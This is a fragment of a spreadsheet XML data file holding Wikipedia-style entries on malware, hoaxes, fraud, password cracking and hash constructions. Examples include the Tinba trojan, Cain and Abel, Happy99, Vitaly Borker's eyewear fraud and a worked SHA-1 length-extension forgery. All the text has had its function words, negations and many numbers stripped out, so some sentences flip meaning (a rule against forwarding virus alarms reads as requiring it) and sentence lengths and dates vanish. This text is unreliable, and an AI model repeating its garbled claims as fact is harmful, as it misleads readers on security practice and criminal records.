external links bleepingcomputer.com virusheat removal instructions virusheat securitylab removal guide virusheat remove virusheat. malware removal instructions. good advice resource virusheat remove your iphone been hacked pop-up virus</t>
  </si>
  <si>
    <t>Virus hoax</t>
  </si>
  <si>
    <t>computer virus hoax message warning recipients non-existent computer virus threat. message usually chain e-mail tells recipients forward everyone know, also form pop-up window. identification most hoaxes sensational nature easily identified fact indicate virus nearly impossible things, like blow recipient's computer fire, less sensationally, delete everything user's computer. they often include fake announcements claimed originate reputable computer organizations together mainstream news media. these bogus sources quoted order give hoax credibility. typically, warnings emotive language, stress urgent nature threat encourage readers forward message people soon possible.virus hoaxes usually harmless accomplish nothing annoying people identify hoax wasting time people forward message. nevertheless, number hoaxes warned users vital system files viruses encourage user delete file, possibly damaging system. examples type include jdbgmgr.exe virus hoax sulfnbk.exe hoax.some consider virus hoaxes chain e-mails computer worm themselves. they replicate social engineering—exploiting users' concern, ignorance, disinclination investigate acting. hoaxes distinct computer pranks, harmless programs perform unwanted annoying actions computer, randomly moving mouse, turning screen display upside down, etc. action anti-virus specialists agree recipients delete virus hoaxes receive them, instead forwarding them.mcafee says: advising users receive email delete pass email hoax propagates. f-secure recommends: forward hoax messages. hoax warnings typically scare alerts started malicious people passed innocent individuals think helping community spreading warning. corporate users hoax problem simply setting strict company guideline: users must forward virus alarms. ever. it's user anyway. message received, users could forward department anyone else. comparison telephone scam telephone scam, commonly operated call centres based india, active since 2008. victim quoted name address, told: "i'm calling microsoft entity sounds like connected microsoft, "windows service center" "windows technical department"). we've report internet service provider serious virus problems windows computer." victim directed open windows event viewer, displays apparently critical warnings, directed website download application allow scammer control computer remotely. caller supposedly fixes problems demands service. addition fraudulent fee, process usually enables malware uploaded victim's computer. parodies virus hoax become part culture twenty-first century gullibility novice computer users convinced delete files basis hoaxes parodied several popular jokes songs. parody "weird yankovic's song "virus alert" album straight outta lynwood. song makes exaggerated claims made virus hoaxes, legally changing name opening rift time space.another parody virus hoaxes honor system virus circulated name amish computer virus, manual virus, blond computer virus, irish computer virus, syrian computer virus, norwegian computer virus, albanian virus, newfie virus, unix computer virus, virus, discount virus many others. this joke email claims authored amish similar low-technology populations computers, programming skills electricity create viruses thus users delete hard drive contents manually forwarding message friends.the tuxissa virus another parody virus hoax, based concept melissa virus, installing linux victim's computer without owner's permission. story says spread e-mail, contained message titled "important message about windows security". supposed first spread virus computers, download stripped-down version slackware uncompress onto hard disk. windows registry finally deleted boot options changed. virus reboots computer, leaving user facing linux login prompt windows security problems solved. also malware comparison computer viruses list trojan horses timeline notable computer viruses worms references external links mcafee virus hoaxes symantec threat explorer trend micro virus encyclopedia</t>
  </si>
  <si>
    <t>Virus Creation Laboratory</t>
  </si>
  <si>
    <t>virus creation laboratory (vcl) earliest attempts provide virus creation tool individuals little programming expertise could mass-create computer viruses. required password access, widely published alongside vcl. password "chiba city", likely reference william gibson novel neuromancer. hacker dubbed "nowhere man", nuke hacker group, released software july 1992.however, later discovered viruses created virus creation laboratory often ineffective, many anti-virus programs caught easily. also, many viruses created program work often, source codes could compiled, thus rendering virus program created unusable. despite limitations, several viruses created program became widespread. references external links documentation</t>
  </si>
  <si>
    <t>Virus Bulletin</t>
  </si>
  <si>
    <t>virus bulletin magazine prevention, detection removal malware spam. regularly features analyses latest virus threats, articles exploring developments fight viruses, interviews anti-virus experts, evaluations current anti-malware products. history profile virus bulletin founded 1989 monthly hardcopy magazine, later distributed electronically format. monthly publication format discontinued july 2014 articles made available standalone pieces site. magazine originally located sophos headquarters abingdon, oxfordshire co-founded owned hruska peter lammer, co-founders sophos. virus bulletin claims full editorial independence favour sophos products tests reviews.technical experts anti-virus vendors written articles magazine, also conducts comparison tests detection rates anti-virus software. products manage detect 100% viruses wild, without false alarms, given vb100 award.the magazine holds annual conference late september, early october) computer security professionals. recent years magazine conference branched discuss anti-spam security issues well malware. notable previous speakers include mikko hyppönen, eugene kaspersky graham cluley, well representatives major anti-virus vendors. references external links official website</t>
  </si>
  <si>
    <t>Vitaly Borker</t>
  </si>
  <si>
    <t>vitaly borker (born 1975 1976 former soviet union), known pseudonyms "tony russo", "stanley bolds" "becky american convicted felon twice served federal prison sentences charges arising online eyeglass retail repair sites, decormyeyes opticsfast. customers complained poor service misfilled orders high-end designer eyewear insulted, harassed, threatened (sometimes physically) sometimes made victim small scams. after going online retail following short career computer programmer several wall street firms, borker encountered difficult customers who, said later, rude, lied cost money unnecessarily. decided rude unscrupulous return, learned surprise internet thing publicity since many posts links site complaint sites ripoff report appeared drive traffic sites google's pagerank algorithm worked time, putting site higher results searches brand names even brands' websites, making money. when york times reporter david segal investigated site 2010, borker freely explained business model segal came visit house brooklyn neighborhood sheepshead bay, borker questioned notion customer always right said "like[d] craziness." month later borker arrested federal postal inspectors charged mail fraud, wire fraud making interstate threats. eventually pleaded guilty fraud charges making threats sentenced prison four years. google websites whose flaws exploited running decormyeyes also changed practices tightened security procedures. before entering prison, borker friend begun setting another website, opticsfast, offering eyeglasses sale repair services. after 2015 release, went back former business practices, mostly probation officer. years later, segal reported borker's return times, borker arrested charged wire mail fraud associated alleged harassment abuse operator opticsfast. february 2018, sentenced years prison violation 2015 parole. following plea deal 2017 charges, later sentenced 2019 years prison followed three years supervised release, $50,000 fine, $300 special assessment.following borker's release late 2020, segal reported times 2021 borker appeared returned selling eyeglasses online, personal business names, harassing dissatisfied customers site called eyeglassesdepot. true, would violation condition 2021 parole avoid involvement online retailing. early 2022 arrested fraud charges related site. biography borker told york times reporter david segal 2010 born russia moved united states parents child; exactly time definitely known. after graduating edward murrow high school 1989 john college criminal justice 1997 began training police officer, working cadet office unit patrolled public housing brooklyn. soon changed mind career path enrolled school learn programming.although classes taught english, students teachers school also russian immigrants, borker recalls. students would taught bare minimum would hired, school would help fabricate résumé work history assure did. "there schools like this," said decade later. "they've shut down."borker first went work variety wall street financial firms, including lehman brothers, worked systems administered accounts mutual fund shareholders. dissatisfied pay, borker took friend side offer create online version eyeglass store. continued running online eyeglass store worked lehman, drawing lawsuits, judgements, luxury brands like chanel selling counterfeit glasses. shortly lehman collapsed 2008 financial crisis, left online retailing full time. decormyeyes website became decormyeyes. borker became disillusioned customers, says lied cost unnecessarily changing minds. stopped caring", says, began responding rudely them. this postings review websites disparaging him, which, amazement, decormyeyes near google search results many links site. seeing value perverse incentive, borker began purposely responding dissatisfied customers threats insults. later reported site made borker $3.2 million year.customers decormyeyes posted numerous reports receiving threats physical violence, abuse, poor service overcharges websites resellerratings, decormyeyes had, 2010, lifetime rating 1.39/10 reviews. customer told authorities complained someone called employer accused dealing drugs. according borker, review link boosted site's pagerank, meaning site came google's ratings many products sold. showed times site actually came higher designer christian audigier's search designer's name. while direct google search "decormyeyes" elicits site many negative reviews, searching individual products brands not.the reason, cited anonymous google publicist, large number links decormyeyes consumer complaint sites ripoff report cause decormyeyes rank high google search results. 2008 borker made post "stanley" satisfaction websites like thanking users links traffic brought him. when website's administrators sent email suggesting could work work things out, replied photograph hand middle finger extended.borker said customers satisfied; called "psychos". questioned notion customer always right. "[n]ot here, understand?" told segal. "why merchant always wrong? customer ever wrong? possible?" allowed stress might well affecting health, doubted would walk away site. like craziness. this works me", said, likening radio shock jock howard stern.borker used websites business. often sourced glasses sellers ebay told simply ship customers' address. seller declined, several address verified paypal, left negative review page, many wanted avoid. when sellers blocked borker, registered different name; reported, ebay barred borker site permanently instituted reforms prevent tactics identify abusive buyers. borker also maintained store amazon.com different name, much fastidious dealings customers, since platform willing remove sellers enough customer complaints.since credit card companies, agreements sellers, cancel service receive enough "chargebacks" buyer disputes every month, borker told times tried make sure avoided alienating many. some customers threatened drop dispute, sometimes suggesting willing employ physical violence emailing pictures houses google earth. told segal bank dropped dispute reinstated charge woman claiming called said longer wished so.google responded times story writing algorithm "detects merchant times article along hundreds merchants that, opinion, provide extremely poor user experience" significantly reduces search visibility product searches. mastercard dropped decormyeyes 2009 excessive chargebacks. borker regained access network using different bank. company told times able supposed placed internal blacklist; wake story told segal list increased safeguards make sure supposed blacklisted were. borker responded impossible shut people completely online. "i'd name friend mine", suggested. "give percent." 2010 arrest federal charges week times story borker arrested agents united states postal inspection service charges mail fraud, wire fraud, making interstate threats cyberstalking, arraigned united states district court manhattan. bail denied basis threat community. search house turned stock counterfeit eyeglasses, fake replica guns. state charges dismissed. after months confinement metropolitan detention center brooklyn, borker freed april 2011 upon posting million bond accepting restrictions included accepting surveillance security guard home, cost thousand dollars day.in 2011, borker pleaded guilty federal district court manhattan counts interstate communication threats, count mail fraud count wire fraud. september 2012, borker sentenced four years federal prison ordered nearly $100,000 fines restitution. released four years later. 2017: opticsfast before imprisonment, borker friend, michael voller, create successor site, opticsfast, continue business—with another friend's name incorporation papers—which later reassumed control release, offering time repair glasses well selling ones. members voller's family furthered scheme telling borker's probation officer working family business fabricating documentation support that. borker resumed tactics selling customers cheap counterfeits luxury brand eyewear insulting harassing complained attempted return exchange merchandise, goal driving traffic site links online complaints, time primarily yelp.borker known physically threatened customers period, although charge mailing label claimed printed customer decided cancel order, tactic later admitted fraudulent allocuting. many communications sent borker name "becky judge paul gardephe noted, source many complaints lodged opticsfast. "[c]ustomers describe interactions opticsfast employees appear irrational imbalanced", wrote sentencing borker. "indeed, many customers filed complaints appear done disturbing nature th[ose] interactions rather loss suffered business opticsfast."some customers face offline harassment. southern california woman, recognized email received come someone involved decormyeyes since referenced order made nearly decade earlier, recalls told phone person purporting police officer needed report police station civil harassment suit filed her; declined asking police involved civil matter. credit card used make eyewear purchase used make series purchases around brooklyn.the york times reported borker's apparent return, noting opticsfast active prison. search engine expert doug pierce, consulted newspaper, found code html running opticsfast page substantially similar decormyeyes 2016, borker released. both domains owner, since sites active borker imprisoned times could certain involved site.in 2017, month story ran, borker arrested charged wire mail fraud associated alleged harassment abuse operator opticsfast. voller, also originally indicted, turned state's evidence borker charges dropped; sentenced time served late 2020. borker sued others state court alleging breach contract.joon kim, acting united states attorney southern district york said "borker's shameless brand alleged abuse cannot tolerated, committed protecting consumers becoming victims criminal behavior". borker's lawyer stated client would "plead guilty defend charges", carried maximum penalty years imprisonment. plea sentencing february 2018, borker sentenced years violating parole release 2015. terms parole forbade lying parole officers, done repeatedly denied started another online eyewear retail site.a month later, borker pleaded guilty wire mail fraud charges exchange reduced sentence. msnbc devoted episode american greed borker june. april 2019, sentenced years prison, followed three years supervised release, $50,000 fine, $300 special assessment. released prison november 2020. 2021–22: eyeglassesdepot 2021, times reported borker returned selling eyeglasses online harassing dissatisfied customers, time site named eyeglassesdepot. customers reported similar behavior, threats, insults online doxxing, including credit card numbers cards' security codes, complained tried return merchandise, attempts intimidate paying printed mailing labels changed mind. they said company's representative identified "arsenio".this time, trustpilot hosted many negative reviews. owner eyeglassesdepot seemed genuinely fear consequences reviews there. followed customer's complaints behavior post claiming fake review posted competing site, along complainant's home address cell phone number. also threatened post multiple fake positive reviews every negative one.trustpilot management investigated receiving complaints, found almost half positive reviews eyeglassesdepot fake. removed sent eyeglassesdepot email asking cease desist behavior. "yeah whatever" read reply.pierce believes eyeglassesdepot opticsfast, look similar share common third-party tags, owner. pierce concluded, "whoever created eyeglassesdepot simply cloned opticsfast, perhaps interest saving time money, made cosmetic changes". pierce allowed individual vitaly borker, "but else would steal code website notorious opticsfast?"borker's attorney denied client arsenio. borker involved eyeglassesdepot, would enough send back prison, since terms recent parole forbid involvement whatsoever online retail.in february 2022, prosecutors announced borker arrested again, count mail fraud, wire fraud aggravated identity theft, latter stemming people's names running eyeglassesdepot. times noted apparently started still halfway house previous conviction, time seemed less audacious, content merely sell used counterfeit eyewear genuine paying refunds, provoking, threatening abusing unhappy customers lesser degree previously. attorney said planned plead guilty. personal life time first arrest, borker married daughter born 2008.in 2019, sentencing opticsfast case, gardephe noted borker diagnosed narcissistic personality disorder, bipolar disorder obsessive-compulsive disorder. also criticism google google search optimization list american greed episodes list ukrainian americans notes references external links resellerratings reviews decormyeyes better business bureau report decormyeyes</t>
  </si>
  <si>
    <t>Tiny Banker Trojan</t>
  </si>
  <si>
    <t>tiny banker trojan, also called tinba, malware program targets financial institution websites. modified form older form viruses known banker trojans, much smaller size powerful. works establishing man-in-the-browser attacks network sniffing. since discovery, found infected dozen major banking institutions united states, including bank, chase, hsbc, wells fargo, pnc, bank america. designed steal users' sensitive data, account login information banking codes. history tiny banker first discovered 2012 found infected thousands computers turkey. after discovered, original source code malware leaked online began undergoing individual revisions, making process detecting harder institutions. highly modified version zeus trojan, similar attack method obtain information. tinba, however, found much smaller size. smaller size makes malware difficult detect. 20kb, tinba much smaller known trojan. reference, median file size desktop website around 1,966kb. operation tinba operates using packet sniffing, method reading network traffic, determine user navigates banking website. malware launch different actions, depending variation. popular form, tinba form grab webpage causing man-in-the-middle attack. trojan uses form grabbing grab keystrokes encrypted https. tinba sends keystrokes command control. this process, turn, causes user's information stolen. second method tinba used allow user webpage. once user malware page information extract company's logo site formatting. create pop-up page informing user updates system, requesting additional information, social security numbers. most banking institutions inform users never information defend types attacks. tinba modified address defense, begun asking users type information asked security questions, user's mother's maiden name, attempt attacker information reset password later time.tinba also injects system processes, attempt convert host machine zombie, unwilling member botnet. order maintain connection botnet, tinba coded four domains, goes loses communication, trojan look others immediately. also references</t>
  </si>
  <si>
    <t>Length extension attack</t>
  </si>
  <si>
    <t>cryptography computer security, length extension attack type attack attacker hash(message1) length message1 calculate hash(message1 message2) attacker-controlled message2, without needing know content message1. algorithms like md5, sha-1 sha-2 based merkle–damgård construction susceptible kind attack. truncated versions sha-2, including sha-384 sha-512/256 susceptible, sha-3 algorithm.when merkle–damgård based hash misused message authentication code construction h(secret message), message length secret known, length extension attack allows anyone include extra information message produce valid hash without knowing secret. since hmac construction, hmac hashes prone length extension attacks. explanation vulnerable hashing functions work taking input message, using transform internal state. after input processed, hash digest generated outputting internal state function. possible reconstruct internal state hash digest, used process data. way, extend message compute hash valid signature message. example server delivering waffles specified type specific user location could implemented handle requests given format: original data: count=10&amp;lat=37.351&amp;user_id=1&amp;long=-119.827&amp;waffle=eggo original signature: 6d5f807e23db210bc254a28be2d6759a0f5f5d99 server would perform request given deliver waffles type eggo given location user "1") signature valid user. signature used mac, signed known attacker. (this example also vulnerable replay attack, sending request signature second time.) possible attacker modify request, example switching requested waffle "eggo" "liege." this done taking advantage flexibility message format duplicate content query string gives preference latter value. this flexibility indicate exploit message format, message format never designed cryptographically secure first place, without signature algorithm help desired data: count=10&amp;lat=37.351&amp;user_id=1&amp;long=-119.827&amp;waffle=eggo&amp;waffle=liege order sign message, typically attacker would need know message signed with, generate signature generating mac. however, length extension attack, possible feed hash (the signature given above) state hashing function, continue original request left off, long know length original request. request, original key's length bytes, could determined trying forged requests various assumed lengths, checking length results request server accepts valid.the message hashing function often padded, many algorithms work input messages whose lengths multiple given size. content padding always specified hash function used. attacker must include padding bits forged message internal states message original line thus, attacker constructs slightly different message using padding rules: data: count=10&amp;lat=37.351&amp;user_id=1&amp;long=-119.827&amp;waffle=eggo\x80\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x02\x28&amp;waffle=liege this message includes padding appended original message inside hash function payload case, 0x80 followed number 0x00s message length, 0x228 (14+55)*8, length plus original message, appended end). attacker knows state behind hashed key/message pair original message identical message final "&amp;." attacker also knows hash digest point, means knows internal state hashing function point. trivial initialize hashing algorithm point, input last characters, generate digest sign message without original key. signature: 0e41270260895979317fff3898ab85668953aaa2 combining signature data request, server forged request valid request signature would generated password known. references</t>
  </si>
  <si>
    <t>Zynn</t>
  </si>
  <si>
    <t>zynn chinese video-sharing social networking service owned kuaishou, beijing-based internet technology company established 2011 cheng yixiao. used create share short videos, pays users using referring others. zynn launched 2020. became most-downloaded store month. also criticized "pyramid scheme", faced accusations plagiarism stealing content. aside zynn north america, kuaishou available name kwai russia, south korea, japan, thailand, vietnam, philippines, malaysia, indonesia, brazil, america, india, middle east. kwai used available australia united states store, removed unknown date. zynn permanently shut august 2021. history 2011, entrepreneur co-founded kuaishou business partner cheng yixiao. originally gif-making app, kuaishou soon moved short video content. also serves current kuaishou ceo.in december 2019, chinese internet conglomerate tencent invested billion kuaishou, reportedly compete rival bytedance. december 2019, kuaishou acquired developer called owlii, developer zynn. zynn developed north american market edition kuaishou.on 2020, launched downloaded million times month. 2020, kuaishou filed lawsuit seeking compensation "unfair competition", accused douyin, sister tiktok, "interfering" search results stores.zynn shut august 2021 features zynn allows users create, edit share short videos themselves. interface described "complete clone" tiktok, main competitor.the zynn unique paid users using platform. each user earned signing could earn money referring users platform. watching videos resulted earning "points", could redeemed gift cards cashed paypal.[1] criticisms controversies multiple tiktok users reported seeing entire accounts plagiarized, account pretending addison rae. despite launched may, many videos posted february. zynn employed "intermittent variable rewards" point system, criticized "same reinforcement strategy used addict people slot machines". cash payouts using resulted criticism accusations anti-competitive behavior. taken google play store june zynn blamed "isolated incident". days later, taken store well.us senator josh hawley criticized platform, calling "predatory" "anti-competitive" letter federal trade commission asking investigation zynn. said "[zynn] smacks textbook predatory-pricing scheme, calculated attain immediate market dominance zynn driving competitors market." notes paying users commonplace china, particularly smaller cities towns residents lower income. seen apps pinduoduo, qutoutiao, weibo's oasis. also kuaishou references external links official website</t>
  </si>
  <si>
    <t>Hail Mary Cloud</t>
  </si>
  <si>
    <t>hail mary cloud was, password guessing botnet, used statistical equivalent brute force password guessing. botnet possibly early 2005, certainly 2007 2012 possibly later. botnet named documented peter hansteen.the principle botnet several thousands likely passwords thousands hosts, rather millions passwords host. since attacks widely distributed, frequency given server unlikely trigger alarms. moreover, attacks come different members botnet, thus decreasing effectiveness based detection blocking. references external links http://bsdly.blogspot.co.uk/2013/10/the-hail-mary-cloud-and-lessons-learned.html</t>
  </si>
  <si>
    <t>Calendaring software</t>
  </si>
  <si>
    <t>calendaring software software minimally provides users electronic version calendar. additionally, software provide appointment book, address book, and/or contact list. these tools extension many features provided time management software desk accessory packages computer office automation systems. calendaring standard feature many pdas, edas smartphones also many office suites personal computers. software local application designed individual (such lightning extension mozilla thunderbird, microsoft outlook without exchange server, windows calendar) networked package allows sharing information users (such mozilla sunbird, windows live calendar, google calendar, microsoft outlook exchange server). features calendaring software contain following features: calendar calendar showing dates days week. example simple software calendar command, simply outputs monthly yearly calendar. address book list contacts information enable user communicate contacts. appointment attachments this feature allow users attach file appointment. appointment includes participants, attachment shared them. appointment calendar list appointments attendees appointments. this software include capability detecting scheduling conflicts, notifying participants conflict, suggesting alternate meeting times. appointment reminders automatically reminds participants upcoming meeting. availability sharing feature allows users share availability others (users select much detail shared); thus facilitating meeting scheduling amongst several individuals. availability capacity checking check availability employee resource calendars group. calendar publishing calendaring tools allow user publish select calendar information public link. calendar exporting users allowed export selected calendars various file formats, including icalendar standard. collaborative scheduling capability software check schedules propose meeting times participants. this allows invitees suggest times work best them, allowing organizer pick meeting time works best participants. customization this feature allow users customize several available features email appointment remainders, calendar viewing default, workweek work hours display, etc. e-mail integration electronic mail communication system. this tied appointment calendar send reminders notify participants issues arising scheduled meetings. group calendar calendar showing dates groups addition individual calendars. multiple calendars feature allows users create separate calendars (i.e. work calendar, children school calendar). multiple views feature allow users select calendar displayed: day, week, month, year, etc. printing user print selected schedule. usually, feature allows users select wants printout look (i.e. include comments, subject only, etc.). timeblocking allow users organize days chunks, assigning task chunk time web-based interface allow users access calendars computer mobile device (including cell phone) without solely rely work personal computer. also personal information manager personal organizer project management software reminder software task management software time-tracking software standards caldav icalendar syncml vcard calendar access protocol webcal</t>
  </si>
  <si>
    <t>Cain and Abel (software)</t>
  </si>
  <si>
    <t>cain abel (often abbreviated cain) password recovery tool microsoft windows. could recover many kinds passwords using methods network packet sniffing, cracking various password hashes using methods dictionary attacks, brute force cryptanalysis attacks. cryptanalysis attacks done rainbow tables could generated winrtgen.exe program provided cain abel. cain abel maintained massimiliano montoro sean babcock. features cracking speeding packet capture speed wireless packet injection ability record voip conversations decoding scrambled passwords calculating hashes traceroute revealing password boxes uncovering cached passwords dumping protected storage passwords spoofing address resolver network password sniffer secret dumper ability crack: ntlm hashes ntlmv2 hashes microsoft cache hashes microsoft windows files cisco hashes cisco hashes apop hashes cram-md5 hashes ospf hashes ripv2 hashes vrrp hmac hashes virtual network computing (vnc) triple hashes hashes hashes sha-1 hashes sha-2 hashes ripemd-160 hashes kerberos hashes radius shared hashes hashes mssql hashes mysql hashes oracle hashes status virus scanners some virus scanners (and browsers, e.g. google chrome 20.0.1132.47) detect cain abel malware. avast! detects "win32:cain-b [tool]" classifies "other potentially dangerous program", microsoft security essentials detects "win32/cain!4_9_14" classifies "tool: this program potentially unwanted behavior." even cain's install directory, well word "cain", added avast's exclude list, real-time scanner known stop cain functioning. however, latest version avast longer blocks cain. symantec (the developer norton family computer security software) identified buffer overflow vulnerability version 4.9.24 allowed remote code execution event application used open large file, might occur using program analyze network traffic. vulnerability present previous version (4.9.23) well patched subsequent release. also black-hat hacker white-hat hacker hacker (computer security) password cracking aircrack-ng crack davegrohl hashcat john ripper l0phtcrack ophcrack rainbowcrack references external links official website (archived) interview massimiliano montoro, developer cain abel</t>
  </si>
  <si>
    <t>Hao123</t>
  </si>
  <si>
    <t>hao123 chinese online listings portal baidu. also versions languages, portuguese (for brazil) thai (for thailand).hao123 accused malicious browser hijacker, often installs without user's consent installed another application, installed difficult remove. hao123 accused using windows service, registry browser parameters modify browser's default setting prevent removed uninstalled adding back windows service. also sniffs user's internet traffic illegally forces users visit website improve website traffic ranking. reason, hao123 considered malware many anti-virus programs.since september 2011, foreign language versions thai launched. however, baidu antivirus software force hao123 homepage, boycotted thai netizens. references external links official website chinese) brazilian version portuguese) thai version thai) japanese version japanese)</t>
  </si>
  <si>
    <t>Happy99</t>
  </si>
  <si>
    <t>happy99 (also termed i-worm) computer worm microsoft windows. first appeared mid-january 1999, spreading email usenet. worm installs runs background victim's machine, without knowledge. generally considered first virus propagate email, served template creation self-propagating viruses. happy99 spread multiple continents, including north america, europe, asia. significance happy99 described paul oldfield "the first virus spread rapidly email". computer security handbook, happy99 referred "the first modern worm". happy99 also served template creation explorezip, another self-spreading virus. spread worm first appeared january 1999. media reports worm started coming united states europe, addition numerous complaints newsgroups users become infected worm. asia pulse reported cases virus japan february, cases reported march—a monthly record time. march 1999, tokyo company accidentally sent 4000 copies virus universities japan.dan schrader trend micro said happy99 single commonly reported virus system month march. virus bulletin published february 2000 reported happy99 caused reports file-infecting malware reach april 1999. sophos listed happy99 among viruses reported year 1999. eric chien, head research symantec, reported worm second reported virus europe 2000. marius oers, researcher network associates, referred happy99 global problem", saying commonly reported viruses 1999. when virus researcher craig schmugar posted virus website, million people downloaded technical details worm spreads email attachments usenet. when executed, animated fireworks "happy year" message display. worm modifies winsock, windows communication library, allow spread. worm attaches automatically subsequent emails newsgroup posts sent user. worm modifies registry automatically start computer rebooted. cases, program cause several error messages appear.the worm written french virus writer known "spanska". other propagating itself, worm damage infected computer. worm typically uses port spread, uses port port available. executable worm 10,000 bytes size; list spammed newsgroups mail addresses stored infected hard drive. worm spreads winsock library read-only. also list computer worms timeline computer viruses worms comparison computer viruses e-mail spam malware references external links cert incident note in-99-02 viruslist email-worm.win32.happy</t>
  </si>
  <si>
    <t>Hare (computer virus)</t>
  </si>
  <si>
    <t>hare virus destructive computer virus infected windows machines august 1996. also known hare.7610, krsna euthanasia. description virus capable infecting .com .exe executable files, well master boot record hard disks boot sector floppy disks. virus read system date computer activate august september time would erase hard disk computer display following message: hdeuthanasia demon emperor: hare krsna, hare, hare timing date virus controversial, even consensus started spreading spring beginning summer 1996 zealand, experts seem disagree precise timing start spread. after little while, effects started show south africa canada. united states arrival hare 1996 continued spreading globally western eastern europe. also timeline computer viruses worms comparison computer viruses references external links hare virus online vsum. hare krishna virus looming (the augusta chronicle)</t>
  </si>
  <si>
    <t>Cabir (computer worm)</t>
  </si>
  <si>
    <t>cabir (also known caribe, sybmos/cabir, symbian/cabir epoc.cabir) name computer worm developed 2004 designed infect mobile phones running symbian believed first computer worm infect mobile phones. when phone infected cabir, message "caribe" displayed phone's display, displayed every time phone turned worm attempts spread phones area using wireless bluetooth signals. worm sent wild, sent directly anti-virus firms, believe cabir current state harmless. however, prove mobile phones also risk virus writers. experts believe worm developed group call 29a, group international hackers, "proof concept" worm order catch world attention. several firms subsequently released tools remove worm, first australian business pacific.the worm attack replicate bluetooth enabled series phones. worm tries send bluetooth enabled devices support "object push profile", also non-symbian phones, desktop computers even printers. worm spreads .sis file installed apps directory. cabir spread user accept file-transfer agree installation, though older phones would keep displaying popups, cabir re-sent itself, rendering useless clicked. cabir first mobile malware ever discovered while worm considered harmless replicates perform activity, result shortened battery life portable devices constant scanning bluetooth enabled devices. cabir named employees kaspersky colleague elena kabirova.mabir, variant cabir, capable spreading bluetooth also mms. sending copies .sis file cellular networks, affect even users outside range bluetooth. also dendroid (malware) mobile malware mobile security symbian shedun references</t>
  </si>
  <si>
    <t>Hash calendar</t>
  </si>
  <si>
    <t>hash calendar data structure used measure passage time adding hash values append-only database hash value elapsed second. thought special kind merkle hash tree, property given moment, tree contains leaf node second since 1970‑01‑01 00:00:00 utc. leaves numbered left right starting zero leaves always added right. periodically publishing root hash-tree possible hash calendar basis hash-linking based digital timestamping scheme. history hash calendar construct invented estonian cryptographers ahto buldas mart saarepera based research security properties cryptographic hash functions hash-linking based digital timestamping. their design goal remove need trusted third party i.e. time timestamp verifiable independently issuer timestamp. construction hash calendar there different algorithms used build hash calendar extract relevant hash chain second. easiest imagine calendar built phases. first phase, leaves collected complete binary trees, starting left, making tree large possible. second phase, multiple unconnected trees turned single tree merging roots initial trees, time starting right adding parent nodes needed (red nodes). hash chains extracted hash tree. since hash calendar built deterministic manner, shape tree moment reconstructed knowing number leaf nodes tree moment, number seconds 1970‑01‑01 00:00:00 moment. therefore, given time calendar tree created hash chain extracted time value corresponding leaf node computed. distributed hash calendar distributed hash calendar distributed network hash calendar nodes. order ensure high availability service possible multiple calendars different physical locations communicate ensure calendar contains identical hash values. ensuring calendars remain agreement form byzantine fault tolerance right node calendar cluster shown node communicates every node cluster single point failure. although node clock clock used setting time directly metronome ensure nodes “beat” time. applications five node hash calendar cluster component keyless signature infrastructure (ksi), leaf hash calendar aggregate hash value globally distributed hash tree. also cryptographic hash functions linked timestamping hash list hash table merkle tree provably secure cryptographic hash function references external links merkle tree patent 4,309,569 explains hash tree structure handle many one-time signatures. efficient merkle trees labs explanation original purpose merkle trees: handle many lamport one-time signatures. https://web.archive.org/web/20110625054822/http://csrc.nist.gov/groups/st/toolkit/secure_hashing.html</t>
  </si>
  <si>
    <t>Hash chain</t>
  </si>
  <si>
    <t>hash chain successive application cryptographic hash function piece data. computer security, hash chain method produce many one-time keys single password. non-repudiation hash function applied successively additional pieces data order record chronology data's existence. definition hash chain successive application cryptographic hash function {\displaystyle string {\displaystyle example, {\displaystyle h(h(h(h(x))))} gives hash chain length often denoted {\displaystyle h^{4}(x)} applications leslie lamport suggested hash chains password protection scheme insecure environment. server needs provide authentication store hash chain rather plain text password prevent theft password transmission theft server. example, server begins storing 1000 {\displaystyle h^{1000}(\mathrm {password} provided user. when user wishes authenticate, supply {\displaystyle h^{999}(\mathrm {password} server. server computes 1000 {\displaystyle h(h^{999}(\mathrm {password} ))=h^{1000}(\mathrm {password} verifies matches hash chain stored. stores {\displaystyle h^{999}(\mathrm {password} next time user wishes authenticate. eavesdropper seeing {\displaystyle h^{999}(\mathrm {password} communicated server unable re-transmit hash chain server authentication since server expects {\displaystyle h^{998}(\mathrm {password} one-way property cryptographically secure hash functions, infeasible eavesdropper reverse hash function obtain earlier piece hash chain. example, user could authenticate 1000 times hash chain exhausted. each time hash value different, thus cannot duplicated attacker. binary hash chains binary hash chains commonly used association hash tree. binary hash chain takes hash values inputs, concatenates applies hash function result, thereby producing third hash value. diagram shows hash tree consisting eight leaf nodes hash chain third leaf node. addition hash values order concatenation (right left 1,0) "order bits" necessary complete hash chain. hash chain blockchain hash chain similar blockchain, utilize cryptographic hash function creating link nodes. however, blockchain used bitcoin related systems) generally intended support distributed consensus around public ledger (data), incorporates rules encapsulation data associated data permissions. also challenge–response authentication hash list contrast recursive structure hash chains, elements hash list independent other. one-time password stretching linked timestamping binary hash chains component linked timestamping. x.509 references</t>
  </si>
  <si>
    <t>Hash filter</t>
  </si>
  <si>
    <t>hash filter creates hash data, typically e-mail, compares previously defined sums. depending purpose filter, data included excluded function based whether matches existing sum. example, message received e-mail server hash filter, contents e-mail converted hash sum. corresponds hash another e-mail categorized spam, received e-mail prevented delivered. spammers attempt evade adding random strings text content random pixel changes ("confetti") image content (see image spam). also bloom filter hash buster locality-sensitive hashing references hash filter algorithm (sql anywhere server usage) ianywhere.com</t>
  </si>
  <si>
    <t>Hash function security summary</t>
  </si>
  <si>
